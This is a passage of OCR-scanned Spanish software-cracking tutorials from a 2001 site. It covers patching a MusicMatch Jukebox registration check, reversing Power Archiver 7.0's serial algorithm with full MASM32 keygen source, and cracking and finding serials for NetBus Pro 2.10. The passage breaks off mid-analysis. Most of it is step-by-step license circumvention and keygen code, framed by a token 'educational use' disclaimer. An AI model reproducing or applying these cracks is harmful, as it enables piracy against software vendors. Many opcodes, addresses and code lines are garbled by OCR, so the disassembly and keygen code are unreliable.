:67A020BB 57 push edi 

:67A020BC E8CC350000 call 67A0568D 
:67A020C1 50 push eax 


F10, F10, FLO, ElO... hasta llegar aquí: 


:67A020E5 E831FDFFFF call 67A01E1B 

:67A020EA BE108AA067 mov esi, 67A08A10 

:67A020EF 53 push ebx 

:67A020F0 8BCE mov ecx, esi 

:67A020F2 E80C250000 call 67A04603 >Compara nuestro serial con el verdadero y si son diferentes EAX=0 lo cual nos hace 
brincar a error. 

:67A020F7 83F801 cmp eax, 00000001 >Compara EAX con 1. 

:67 A020FA 0F85D3000000 jne 67A021D3 >Salta a error si son diferentes. 
:67A02100 57 push edi 

:67A02101 53 push ebx 

:67A02102 50 push eax 


* Possible StringData Ref from Data Obj ->"Upgrade Key" 


:67A02103 68B882A067 push 67A082B8 


* Possible StringData Ref from Data Obj ->"MMGenlInfo" 


:67A02108 68AC82A067 push 67A082AC 
:67A0210D FFS5CC call [ebp-34] 
:67A02110 83C414 add esp, 00000014 
:67A02113 85CO0 test eax, eax 

:67A02115 7411 je 67402128 


Vemos que si se produce el salto jne 67A021D3 nos mandan directo a chupar camote, con lo cual evitarían que lleguemos a la zona 
donde se escribe nuestro serial en el registro de Windows en: HKEY_LOCAL_ MACHINE SoftwarAMusicMatcAMusicMatch 
Jukebox 4.AMMGenInfAUpgrade Key, si cambiamos el susodicho salto anotando justo encima de el R FL Z (cambiar flag cero) 
podremos estar seguros que el programa no hara mas comprobaciones y estara totalmente crackeado pudiendo asi copiar Cds a Mp3 
a 160 kbps en nuestro ordenata, aunque con muy mala calidad por cierto. 


En realidad este crack es muy sencillo y el tuto muy corto por lo que no merecía ser escrito, pero quería demostrar que las 
protecciones aunque sean tan estúpidas como esta no necesariamente tienen que estar en el mismo ejecutable, Ok?. 


Antes de terminar pensemos un poco en algo que podríamos encontrarnos por ahí, si quisiéramos crackear un programa con alguna 
protección como esta, pero en lugar de que sea la función en la DLL la que muestre el mensaje de error, la función regresara un 
valor al ejecutable y fuera el mismo quien mostrara el mensaje dependiendo de el valor que se haya retornado ¿Qué pasaría entonces 


si buscamos dentro del ejecutable, eh?, pues no encontraríamos por ningún lado el lugar donde se hacen las comparaciones o donde 
se genera el serial correcto dentro del programa desensamblado, se podría encontrar simplemente tracenado después de un BPX 
GetWindowTexta por ejemplo, pero hay estar concientes de que el León no es como lo pintan. Bueno esto ha sido todo y como dice 
la zorra: a chingar a otro lado y que Dios te socorra. 

Hasta el próximo (sí es que llega). 


Sugerencias, comentarios, correcciones y demás a: ckener452 O hotmail.com 


"Este tutorial es exclusivamente para uso educacional, el autor no se hace responsable por el mal uso que se le pueda dar." 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Power Archiver 7.0 


Name / Serial. 

Hacer un Keygen. 

Compresor/Descompresor con un montón de formatos. 
Aficionado. 


http: //download.powerarchiver.com/powarc70.exe 


Softice, MAsm32. 


CaoS ReptantE FECHA: 03/07/2001 


INTRODUCCION 


Este programa había sido gratuito hasta esta versión, y la verdad es que podía haber seguido así. Y es que 
para la protección que le han puesto, mejor no haberse molestado. Me gustaría que el infausto programador 
leyera este tuto, ya que le sería de utilidad, aunque dudo que lo lea, ni este ni cualquier otro :0( La verdad 
es que últimamente me debato entre la rabia que me da que sean tan descuidados y la pena que me da su 
ingenuidad. Pero bueno, allá ellos... Como veréis, me he decidido a continuar con el tema de los keygens. 
He encontrado otra razón para preferir el keygen o al menos el serial al parche, y es que me ha pasado que 
un programa dado por crackeado, al cabo del tiempo, y por razones que desconozco (yo no lo utilizo, lo 
está "evaluando" un amigo), ha salido de su letargo y se ha acordado de que no está registrado. Esto con un 
número de registro "legal", no habría ocurrido. 


AL ATAKE 


Encontrar el serial number es muy sencillo. Basta con ejecutar el programa con el Softlce cargado, introducir los 
datos que nos pida el cuerpo para registrarnos, y antes de pulsar "OK", introducir en el SIce: bpx hmemcpy. Le 
damos a "OK", salta el Slce, le damos a FS para que lea la segunda ventana de texto, siete veces a F12 y estamos en 
el programa. Si queremos saber el serial, buscaremos en la memoria el serial que hemos introducido mediante la 
instrucción s 30:00 1 f£ffffff 'serial_chungo' y a continuación le pediremos al Slce que nos avise cuando se lea este 
número mediante bpm dirección_obtenida r y llegaremos a esta zona: 


:00404039 8BOE mov ecx, dword ptr [esi] 
:0040403B 8B1F mov ebx, dword ptr [edi] 
:0040403D 39D9 cmp ecx, ebx 
:0040403F 7558 jne 00404099 


Aquí podremos ver en la dirección indicada por ESI y EDI el serial chungo y el serial bueno respectivamente. Tened 
en cuenta que el número lo escribe en un par de sitios y es posible que no acertemos a la primera. Por cierto, os 
recuerdo que introduciendo la instrucción s (sin parámetros) continua la búsqueda, hasta encontrar la siguiente 
coincidencia. 


Ahora, aunque agotados por el esfuerzo ;0o) vamos a ver el proceso de generación del número correcto. Este se 
obtiene a partir del nombre, por lo que seguiremos un proceso parecido al anterior, pero en el que buscaremos el 
momento en que el programa lee nuestro nombre en vez del número. Aquí la cosa se complica porque el programa 
copia el nombre en otro lugar: 


:0040296F F3 repz 
:00402970 A5 movsd 


Esta instrucción copia una cadena de texto de la dirección indicada por DS:ESI a la indicada por CS:EDI. Sólo a 
título orientativo, daré las direcciones: 016F:018891E0 y 0167: 00E0F2DD como origen y destino, aunque pueden 
cambiar en cada ejecución. Para detectar la lectura del nombre en la nueva dirección, ponemos la instrucción bpm 
nueva_dirección r y ahora sí que nos lleva al punto culminante. Se trata de un bucle que se repite tantas veces como 
letras tenga nuestro nombre: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0058B88A (C) 
:0058B82A 33C0 xor eax, eax 
:0058B82C 8A03 mov al, byte ptr [ebx] 


Llegamos aquí, en el momento en que el programa lee la primera letra del nombre: "C". Por tanto AL=43h. 


:0058B82E 03C6 add eax, esi 


En el primer paso por el bucle, ESI=1403h, en los siguientes pasos, tomará el valor correspondiente. El resultado de 
la suma es 43h + 1403h = 1446h. 


:0058B830 B9FFO000000 mov ecx, 000000FF 
:0058B835 99 cda 
:0058B836 F7F9 idiv ecx 


La instrucción CDQ es necesaria para la división siguiente , ya que convierte doble word en cuádruple, es decir, 
EAX -> EDX : EAX. La división se efectúa entre EDX : EAX y ECX, el resto que es lo que nos interesa, se coloca 
en EDX. 


:0058B838 8BF2 mov esi, edx 


Hemos dividido 1446h entre FFh, el resultado es 14h y el resto SAh, que colocamos en ESI. 


:0058B83A 3B7DF4 cmp edi, dword ptr [ebp-0C] 
:0058B83D 7D03 jge 0058B842 
:0058B83F 47 inc edi 


:0058B840 EBO5 jmp 0058B847 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0058B83D (C) 


:0058B842 BF01000000 mov edi, 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| :0058B840 (U) 

:0058B847 33C0 xor eax, eax 

:0058B849 8A843DECFEFFFE mov al, byte ptr [ebp+edi-00000114] 


Aquí se coloca el código ASCII de la primera letra de la cadena de texto "IP-POWERARC" (49h). Hay que señalar 
que si el nombre es más largo que esta cadena, se vuelve a empezar por la primera letra. 


:0058B850 33F0 xor esi, eax 


Se efectúa un XOR entre SAh y 49h que da como resultado 13h. Este será el valor de ESI al segundo paso por el 
bucle. 


:0058B852 8D85E0FDFFFF lea eax, dword ptr [ebp+FEFFFDEO] 
:0058B858 50 push eax 

:0058B859 89B5E4FDFFFF mov dword ptr [ebp+FFFFFDE4], esi 
:0058B85F C685E8FDFFFFOO mov byte ptr [ebp+FFFFFDE8], 00 
:0058B866 8D95E4FDEFFFF lea edx, dword ptr [ebp+FEFFFDE4] 
:0058B86C 33C9 XOYr ecx, ecx 

* Possible StringData Ref from Code Ob3 ->"31.2x" 


:0058B86E B858B95800 mov eax, 0058B958 

:0058B873 E87CDDE7FE call 004095F4 

:0058B878 8B95E0OFDEFFFF mov edx, dword ptr [ebp+FFFFFDEO] 
:0058B87E 8D45F0 lea eax, dword ptr [ebp-10] 
:0058B881 E88286E7FE call 00403F08 


En este call se irán colocando los resultados obtenidos de las operaciones descritas anteriormente formando una serie 
encabezada por 14 03. Al terminar la primera ejecución del bucle, la serie será: 14 03 13. 


:0058B886 43 inc ebx 
:0058B887 FF4DEC dec [ebp-14] 
:0058B88A 759E jne 0058B82A 


Al salir del bucle, el valor de la serie correspondiente al nombre "CaoS ReptantE" es: 14 03 13 24 BE 42 2D 2B C8 
6B 9E 52 83 BE 54. Continuamos: 


::0058B88C 8B45F0 mov eax, dword ptr [ebp-10] 


Pone en EAX la longitud de la serie (1E). 


:0058B88F E86C86E7FE call 00403F00 
:0058B894 8BFO mov esi, eax 
Ahora en ESI. 

:0058B896 85F6 test esi, esi 
:0058B898 7903 jns 0058B89D 
:0058B89A 83C603 add esi, 00000003 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0058B898 (C) 


:0058B89D C1FE02 sar esi, 02 


Esta instrucción equivale a dividir ESI por 4. En nuestro caso 1E : 4=7 (el resto, que es 2, no cuenta). 


Lo que viene a continuación es un cierto galimatías que no me siento con fuerzas para detallar :0) Resumiendo, en 
nuestro caso, lo que hace es tomar la 7* cifra (2) y ponerla en otro lado. A continuación, pone la anterior (3), y va 
haciendo lo mismo con los otros múltiplos de 7 hasta completar las ocho cifras de la clave (14*, 13*, 21*, 20*, etc.). 
Así la clave correspondiente al nombre que hemos introducido es: 23D29BEB. Tengamos en cuenta que la longitud 
mínima del nombre para poder conseguir una clave de ocho cifras es de dos caracteres (dos caracteres nos dan cuatro 
cifras, que junto con 1403 nos dan las ocho) y que aunque el programa no controla (que yo sepa) la longitud del 
nombre, no aceptará ningún serial correspondiente a un nombre de una letra. Lo digo más que nada por si alguien 
quiere hacer la prueba. 


Ahora vamos a programar un generador de números de registro. 


En este manual, sólo voy a comentar lo estrictamente relacionado con este programa, ya que la estructura del keygen 
es similar a la de otros que ya conocemos por haberlos visto anteriormente. Si algo no queda claro, porque no habéis 
leído mis trabajos anteriores, o porque no está bien explicado, me podéis dar un toque. 


Como siempre, echaremos mano del Msam32. Empezaremos por el fichero de recursos rsrc.rc: 


include "Amasm32Xincludelresource.h" 
define IDD_DIALOG 1000 
define IDC_NAME 1001 
define IDC_SERIAL 1002 
define IDC_GEN 1003 
define IDC_EXI 1004 
define IDC_STATIC 1 

keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,104,65 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "Power Archiver 7.0" 


FONT 10, "MS Sans Serif" 


BEGIN 
¿TEX "Nombre", IDC_STATIC,8,6,28,12 
TEX "Serial",IDC_STATIC,8,26,28,12 
EDITTEX IDC_NAME, 36,6,59,12,ES_AUTOHSCROLL | ES_CENTER 
EDITTEXT IDC_SERIAL,36,26,59,12,ES_READONLY | ES_CENTER 
PUSHBUTTON "Generar", IDC_GEN, 8, 45,40,14 
PUSHBUTTON "Terminar", IDC_EXIT,57,45,40,14 


END 


Y ahora el fichero de código powerarc.asm: 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32XincludeYwindows.inc 
include c:imasm32lincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_SERIAL EQU 1002 
IDC_GEN EQU 1003 
IDC_EXIT EQU 1004 


DlgFunc PROTO :DWORD, : DWORD, :DWORD, : DWORD 


Operacion PROTO 


. data 

nombre db 64 dup(0),0 
cadena db 130 dup(0),0 
serial db 8 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 
Iconimage db "keygen",0 

texto db "IP-POWERARC",0 
minombre db "CaoS ReptantE",0 
menosde2 db "¡Mínimo 2 caracteres!",0 
hInstance dd O 

hIcon dd 0 

hWnd dd 0 

. code 

start: 


invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 

mov eax,hDlg 

mov hWnd, eax 

invoke LoadIcon,hInstance,addr Icono 

mov hlIcon,eax 

invoke SendMessage, hDlg, WM_SETICON,1,hIcon 

invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
.elseif uMsg==WM_CLOSE 

invoke EndDialog,hDl1g,NULL 
.elseif uMsg==WM_COMMAND 

mov eax,wParam 


mov edx,eax 


shr edx,16 

.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NAME,ADDR nombre, 80 


invoke l1lstrlen,ADDR nombre 


invoke Operacion 


.1f eax== 

invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nada 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR menosde2 
.else 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR serial 
invoke SetDlgltemText,hDlg,IDC_NAME, ADDR nombre 


.endif 
ret 
.endif 
.endif 
.endif 
ret 


DlgFunc endp 


Esta parte es similar a lo que hemos visto en trabajos anteriores. Ahora entramos en terreno desconocido :0) 
Operacion proc 


.1f eax < 2 
mov eax,1l 
ret 

.endif 
pushad 


Comprobamos la longitud del nombre y si es menor que dos, volvemos y damos el mensaje de error. En caso 
contrario, guardamos los registros (no creo que sea necesario, pero por si acaso...) y continuamos: 


mov esi,1403h 

xor edx, edx 
mov ebx, offset nombre 

mov edi, offset texto 

mov ebp, offset cadena 

for codigo, <49,52,48,51> 
mov byte ptr [ebp], codigo 
inc ebp 

endm 


Colocamos en la dirección de cadena los códigos ASCII de: 1, 4, O y 3. Tened en cuenta que en Masm32, los 
números se suponen en base decimal, a no ser que se indique lo contrario (con "h" al final) como he hecho más arriba 
con el 1403h. También hay que saber que si se pone un número hexadecimal que empiece por una letra, hay que 
poner un cero delante para que el programa sepa que se trata de un número. He puesto números hexadecimales para 
facilitar la comparación con el programa original, y decimales cuando me ha parecido que resultaba más claro. 


buclel: xor eax, eax 
mov al, byte ptr [ebx]l 
«if al == 0 
jmp seguir 
.endif 


Tomamos cada uno de los caracteres del nombre y comprobamos que no sea cero. Si es igual a cero, significa que 
hemos terminado con el nombre y saltamos. 


ebx 
eax, 
ecx, 


inc 
add 
mov 
cda 
idiv ecx 
mov esi, 


esi 
O0FEFh 


edx 


Como veis, esto hace lo mismo que el programa original. 


al, 
al== 
edi, 


mov 
Pa Es 
sub 
jmp 
.endif 


volver: 


Si hemos llegado al fin 


inc edi 
xor esi, 
xor edx, 
mov eax, 


byte ptr 


[edi] 


dl 


volver 


al del campo texto (IP-POWERARC), volvemos al principio. 


eax 
edx 
esi 


Ahora ya tenemos un número, por ejemplo SAh, pero para poder tratar cada dígito por separado y poder imprimirlo 


luego en pantalla, nece 


mov ecx, 


sitamos convertirlo en el código ASCII de las cifras que lo forman. 


16 


mas1l: 


div 
¿E 


ecx 
eax < 10 

add eax, 48 

jmp mas1l 

.endif 

.1f eax > 9 

add eax,55 

.endif 

mov byte ptr [ebp], 
inc ebp 


al 


Si dividimos SAh por 16, lógicamente nos dará un cociente de 5 (en EAX) y un resto de A (en EDX). A continuación 
miramos si el cociente está representado por un número del 0 al 9 y si es así, le sumamos 48 (en nuestro caso 48 + 5 
= 53, código ASCII de "5"). Si es una letra de la A a la F, entonces le sumamos 55. Colocamos el resultado en la 


dirección de la variable cadena. 


mas2: 


.1f edx < 10 

add edx, 48 

jmp mas2 

.endif 

.1f edx > 9 

add edx,55 

.endif 

mov byte ptr [ebp], 
inc ebp 

jmp buclel 


dl 


Hemos hecho lo mismo con el resto que con el cociente (en este caso, a Ah = 10 le hemos sumado 55 y hemos 
obtenido 65 que es el código ASCH de "A”). Colocamos el resultado a continuación del anterior y vamos a por otro. 


Una vez terminado el nombre, continuamos: 


seguir: 


offset serial 
mov esi, offset cadena 
sbb ebp, esi 

sar ebp, 2 

dec esi 
xor eax, 


mov ebx, 


eax 


Esto es más o menos, lo mismo que el programa original. Decrementamos ESTI porque si no, al contar cifras (en 
nuestro caso, siete) lo haría a partir de la segunda cifra, ya que ESI apunta a la primera. 


bucle2: add esi, ebp 
mov dl, byte ptr [esil 
mov byte ptr [ebx], dl 
inc ebx 
inc eax 
mov dl, byte ptr [esi-1] 
mov byte ptr [ebx], dl 
inc ebx 
inc eax 
.1f eax < 8 
jmp bucle2 
.endif 


Este bucle se efectúa ocho veces para obtener las ocho cifras del serial que se colocan en la variable serial. Ahora 
recuperamos los registros y volvemos. 


popad 
ret 
Operacion endp 


end start 
Y con esto terminamos el keygen. 
Os recuerdo que si os interesa este tema, es imprescindible leer: "Como Craquear con Ensamblador para Win32" de 


Mr. Crimson. ( http://www.multimania.com/mrcrimson/private/MrCrimson!l.zip). Tengo una gran deuda contraida 
con él y también con JoTaKe. 


Ahora sólo queda la comprobación. En este programa es fácil, basta con poner en el Slce un bpx 40403D y en la 
dirección de EDI se puede ver el número correcto. Ahora sólo es cuestión de probar con los nombres más 
inverosímiles, y ver si el resultado coincide :0) 


(2 Power Archiver 7.0 PA ES | 


Nombre | CaoS ReptantE 
Serial 23D29BEB 


Terminar | 


Ya sólo me queda recordaros que si vais a utilizar regularmente el programa, debéis pagar por él. Pensad que un día, 
vuestros hijos os pueden preguntar si vosotros erais de aquella gente que no pagaba por sus programas, y entonces 
diréis: "¿QUIÉN, YOOO?". Que vergiienza... 30) 


Para finalizar, quiero enviar un saludo a mis amigos Act Mago y DeK_OIiN. Saludos también a Karpoff, 
agradeciéndole sus palabras de aliento y en general, a todos los que comparten sus conocimientos con los demás :0) 


Para consultas relativas a mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Netbus Pro v2.10 

PROTECCION: Serial. 

Objetivo: Crack / Loader / Serial / Keygen 

Descripcion: Version Comercial del famoso Troyano 

Dificultad: Aficionado 

DOWNLOAD: http://go.to./mr_burns 

Herramientas: Softice, Languaje2000, ProcDump, IceDump, Win32DAsm, Tasm v5.0 

CRACKER: Mr.Burns FECHA: 13/08/2001 
INTRODUCCION 


Hola de nuevo a todos. Despues de una gran demora he vuelto con fuerza!!! jejeje Despues de un par de dias de duro trabajo y 
alguna ke otra noche sin dormir he decidido culminar mi trabajo con el Netbus con un tutorial, mas que nada para recordar viejos 
tiempos ;) 


Espero que disfruten y aprendan de este tuto tanto como yo. He de pedir disculpas por el excesivo tamaño del tutorial (para que 
luego digan que el saber no ocupa lugar jeje), pero he intentado detallar lo mas posible para realizar un "buen" estudio del 
programa.... Bueno... creo que el magnifico tiempo acompaña (al igual que la cervezita y el cigarrito de rigor) asi que creo que 
deberiamos empezar con lo nuestro, no? 


PUes...... AL ATAQUE! 


AL ATAKE 


El objetivo de este tutorial es, lo que yo llamo, un completo: CRaCK, SeRiaL €: KeYgEn. Empezamos recopilando algo de 
informacion sobre el programa con el que vamos a "jugar", para saber en que lenguaje ha sido escrito yo suelo usar el 
Languaje2000, con el que podremos saber que esta hecho en Pascal (si sus entrañas fueran Visual Basic, este tutorial no 
existiria ;)) Tambien usaremos el ProcDump para averiguar si sus secciones son "ejecutables y modificables", una vez dentro 
podemos observar que hay 8 secciones (.CODE, .DATA, .BBS, .idata, .tls, .rdata, .reloc, .rsrc) y que la seccion .CODE tiene un 
valor 60000020 el cual cambiaremos rapidamente a E0000020, para poder modificar el codigo a nuestro gusto xD. Despues 
corremos el programa, vemos como funciona y nos damos cuenta que es no nos gusta, al menos a mi, y todo ello porque es 
una version comercial por la que debemos PAGAR!!! cuando hace nada era un peligroso troyano!!! =( Bueno, creo que 


deberiamos remediar esto. Vayamos al menu Help/Register, e introducimos nuestros datos: 
Your Name: Mr. Burns 
Company: Hispano Crackers 


Key: 1234567890 


--- Objetivo 1: CRaCK --- 


Una vez introducidos los datos, entramos en el SiCe (asi llamaremos al Softl ce) con Control + D, y situamos los tipicos bpx: 


bpx GetWindowTextA y bpx GetDlgltemTextA. Salimos de nuevo del SiCe (Control + D) y presionamos el boton Register, y.... 
no pasa nada!!!? Vaya que raro, pues habra que probar con nuestro bpx comodin: bpx hmemcpy a ver que pasa... Asi que 
volvemos a realizar la misma operacion, y una vez dentro de SICE os recomiendo quitar el bpx (bc *) para que no nos 
moleste en nuestra travesia por el codigo. Como siempre, hemos de tracear incontables veces hasta entrar en el codigo del 
programa, en este caso, entraremos en la seccion de ,CODE (Netbus!CODE+XxXxXxXx). Una vez dentro del programa, hemos 
de pasar por 7 RETSs hasta llegar al punto deseado: el lugar donde se recoge el nombre, y este punto esta en la direccion 
4E£0C87. Aqui podremos encontrar algo tal que asi: 


:004FE0C87 8B45F4 mov eax, dword ptr [ebp-0C] <--- EAX = Nombre 
:004E0C8A 50 push eax 


* Possible StringData Ref from Code Obj ->"Name" 


| 
:004E£0C8B B9680D4E00 mov ecx, 004E0D68 


* Possible StringData Ref from Code Obj ->"License" 


| 

:004E0C90 BA780D4E00 mov edx, 004£0D78 

:004E0C95 8B45F8 mov eax, dword ptr [ebp-08] 

:004£0C98 ESAB81F9FF call 00478E48 <--- Introduce el nombre en el registro (ya lo veremos mas adelante) 
:004E0C9D 8D55F4 lea edx, dword ptr [ebp-0C] 

:004EOCAO 8B45FC mov eax, dword ptr [ebp-04] 

:004E0CA3 8B80DC020000 mov eax, dword ptr [eax+-000002DC] 

:004EOCA9 E8D224F5FF call 00433180 

:004EOCAE 8B45F4 mov eax, dword ptr [ebp-0C] <--- EAX = Nuestro Numero de Serie 

:004FE0CB1 50 push eax 


* Possible StringData Ref from Code Obj ->"Key" 


| 
:004E0CB2 B9880D4E00 mov ecx, 004E0D88 


* Possible StringData Ref from Code Obj ->"License" 


| 

:004E0CB7 BA780D4E00 mov edx, 004E0D78 

:004E0CBC 8B45F8 mov eax, dword ptr [ebp-08] 

:004EOCBF E88481F9FF call 00478E48 <--- Introduce el numero de serie en el registro 
:004E0CC4 8D55F4 lea edx, dword ptr [ebp-0C] 

:004E0CC7 8B45FC mov eax, dword ptr [ebp-04] 

:004EOCCA 8B80D8020000 mov eax, dword ptr [eax+-000002D8] 

:004E0CDO ESAB24F5FF call 00433180 

:004E0CD5 8B45F4 mov eax, dword ptr [ebp-0C] <--- EAX = Compañia 

:004E0CD8 50 push eax 


* Possible StringData Ref from Code Obj ->"Company" 


| 
:004E0CD9 B9940D4E00 mov ecx, 004E0D94 


* Possible StringData Ref from Code Obj ->"License" 
| 


:004EO0CDE BA780D4E00 mov edx, 004E0D78 

:004E0CE3 8B45F8 mov eex, dword ptr [ebp-08] 

:004E0CE6 E85D81F9FF call 00478E48 <--- Introduce la compañia en el registro 
:004EO0CEB 33C0 xor eax, eax 

:004EOCED 5A pop edx 

:004EOCEE 59 pop ecx 

:004EOCEF 59 pop ecx 

:004E0CFO 648910 mov dword ptr fs:[eax], edx 

:004E0CF3 68080D4E00 push 004E£0DO8 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|: 004E0DO6(U) 


| 

:004E0CF8 8B45F8 mov eax, dword ptr [ebp-08] 
:004E0CFB E86023F2FF call 00403060 

:004E0D00 C3 ret <--- Nos lleva a la direccion 4E0D08 


:O04E0DO1 E9062AF2FF ¡mp 0040370C 
:004£0D06 EBFO ¡mp 004E0CF8 


:004E0D08 ES6F54FFFF call 004D617C <--- Aqui dentro se generan los serials correctos 
:004E0DOD 84CO0 test al, al 


:004E0DOF 7414 je 004E0D25 <--- si nuestro serial ha sido correcto no saltamos 
:004£0D11 B940000000 mov ecx, 00000040 


* Possible StringData Ref from Code Obj ->"Thanks" 


:004E0D16 BAA40D4E00 mov edx, 004E0DA4 <--- EDX = Titulo del ventanuco 


* Possible StringData Ref from Code Obj ->"Thanks for registering NetBus " 
->"Pro and supporting Shareware software." 


| 
:004F0D1B B8B40D4E00 mov eax, 004E0DB4 <--- EAX = Mensaje del ventanuco 
:004E0D20 E8736F0000 call 004E7C98 <--- Crea el ventanuco... 


Despues de ver esto, lo 12 que se nos ocurre es cambiar ese J E en la direccion 4E0DOF por un JNE o por un par de NOPs 
para que siempre nos salga, el ventanuco; podeis intentarlo pero seguiremos en las mismas, es decir, sin estar registrados 
porque nos seguira saliendo esa fea publicidad y un cuadro de inicio tan feo como este 


NeiBus Pro 


“version 2.10 


Please register this software if you like it and have 
use of it 


Una vez hecho esto, lo que vamos a hacer es desensamblar el programa con el Win32DAsm (tardara un rato asi que podeis 
iros a por otra cervezita ;)) BIEN!! ahora nos vamos a la direccion donde se llama a la rutina que genera los serials, la 


direccion 4D617C (:004E0DO8 E86F54FFFF call 004D617C) y podemos ver que hay varias llamadas esta direccion, ademas de 
un salto: 


* Referenced by a CALL at Addresses: 
|:004D6363 , :004D958C , :004E0DO8 , :004E5448 , :004E5E81 
|:004FO63D , :004FOB86 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:004D617A(C) 


| 
:004D617C 55 push ebp 
:004D617D 8BEC mov ebp, esp 


Ahora vamos a apuntar esas CALL s y cargamos el Loader del SICE, ponemos los BPX en esas direcciones y le damos al F5 
para ver que que llamada es la que comprueba que el serial que habiamos introducido es correcto para eliminar la publicidad 
y sacarnos esta ventana tan bonita: 


NeiBus Pro 


“version 2.10 


This product is licensed to: 


Mr. Bumns 
Hispano Crackers 


Al instante de haber apretado F5, el SICE nos llevara a la direccion 4D6363: 
:004D6363 ES14FEFFFF call 004D617C 
:004D6368 84CO0 test al, al 


:004D636A 7426 je 004D6392 


Lo unico que debemos hacer es cambiar ese JE de la direccion 4D636A por un J NE o, mejor, por un par de NOPs. Una vez 


Siento no detenerme mas detenidamente en esta parte, pero mi objetivo principal es el keygen (ese si que va a ser bonito de 
verdad) y, sinceramente, saltarse la proteccion de este programa es basico. Asi que pasemos a la obtencion del serial... 


--- Objetivo 2: SeRiaL --- 


En este apartado nos dedicaremos a hallar los dos serials que el programa admite como validos para el registro. Asi que. . 
vamos a ello!!! Tenemos una ventaja, ya sabemos la direccion donde se generan los serials (4D617C), porque ya lo hemos 
hallado antes. Asi que entramos de nuevo en el SICE, esta vez con el Loader, para evitar problemas de cuelgues, y ponemos 
un bpx en esa direccion: bpx 4D617C. Le damos al F5 e instantaneamente el SICE parará ya que esta en la comprobacion 
que nos saltamos antes (la de la llamada 4D6363). A partir de ahora tendremos que ir traceando poco a poco y con atencion, 
cualquier llamada puede ser la que nos proporcione nuestros serials. Despues de tracear un poquito, vemos que en la 
direccion 4D61D6 se empieza a "manejar" nuestro serial (1234567890), asi que a partir de ahi, habra que ir con extrema 
atencion. Analicemos el codigo: 


:004D61D6 8B4DFO mov ecx, dword ptr [ebp-10] <--- ECX = Nuestro Serial 

:004D61D9 BA84624D00 mov edx, 004D6284 <--- EDX = $ 

:004D61DE E8SD1DDF2FF call 00403FB4 <--- Inserta al principio de nuestro serial $ 
:004D61E3 8B95E8FEFFFF mov edx, dword ptr [ebp+FFFFFEE8] <--- EDX = $ + Nuestro serial 
:004D61E9 8D85ECFEFFFF lea eax, dword ptr [ebp+FFFFFEEC] 

:004D61EF B9FFO00000 mov ecx, OOOOOOFF 


:004D61F4 E84BDDF2FF call 00403F44 <--- Ahora inserta al principo la longitud de EDX 

:004D61F9 8D85ECFEFFFF lea eax, dword ptr [ebp+FFFFFEEC] <--- EAX = Serial Long + $ + Nuestro Serial 
:004D61FF 50 push eax <--- Lo guarda 

:004D6200 8D85E8FDFFFF lea eax, dword ptr [ebp+FFFFFDE8] 

:004D6206 8B55EC mov edx, dword ptr [ebp-14] <--- EDX = Nuestro Nombre 

:004D6209 B9FFO00000 mov ecx, OODOOOFF 

:004D620E E831DDF2FF call 00403F44 <--- Inserta al principio la longitud de nuestro nombre 

:004D6213 8D95E8FDFFFF lea edx, dword ptr [ebp+FFFFFDE8] <--- EDX = Name Long + Nuestro Nombre 
:004D6219 8B45F8 mov eax, dword ptr [ebp-08] 

:004D621C 59 pop ecx 


:004D6222 85C0 test eax, eax 


En la direccion 4D621D es donde se generan nuestros serials. Asi que, vamos a entrar a ver que nos encontramos: 


:004D5464 53 push ebx 

:004D5A65 56 push esi 

:004D5A66 57 push edi 

:004D5A67 83C4C0 add esp, FFFFFFCO 

:004D5A6A 8BF1 mov esi, ecx 

:004D5A6C 8D3C24 lea edi, dword ptr [esp] 

:004D5A6F 33C9 xor ecx, ecx 

:004D5A71 8A0E mov cl, byte ptr [esi] <---CL = Longitud del $ + Serial 
:004D5A73 80F909 cmp cl, 09 

:004D5A76 7202 jb 004D5A7A <--- Si es menor => ERROR!!! 
:004D5A78 B109 mov cl, 09 <--- CL = 9 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5A76(C) 


| 

:004D5A7A 880F mov byte ptr [edil], cl 

:004D5A7C 46 inc esi 

:004D5A7D 47 inc edi 

:004D5A7E F3 repz 

:004D5A7F A4 movsb <--- Desplaza a EDI los 9 primeros caracteres del serial, incluido el $ (vamos, que lo recorta si es 
mayor de 9) 

:004D5A80 8BF2 mov esi, edx 

:004D5A82 8D7C240A lea edi, dword ptr [esp+0A] 

:004D5A86 33C9 xor ecx, ecx 

:004D5A88 8A0E mov cl, byte ptr [esi] <--- CL = Longitud del nombre 
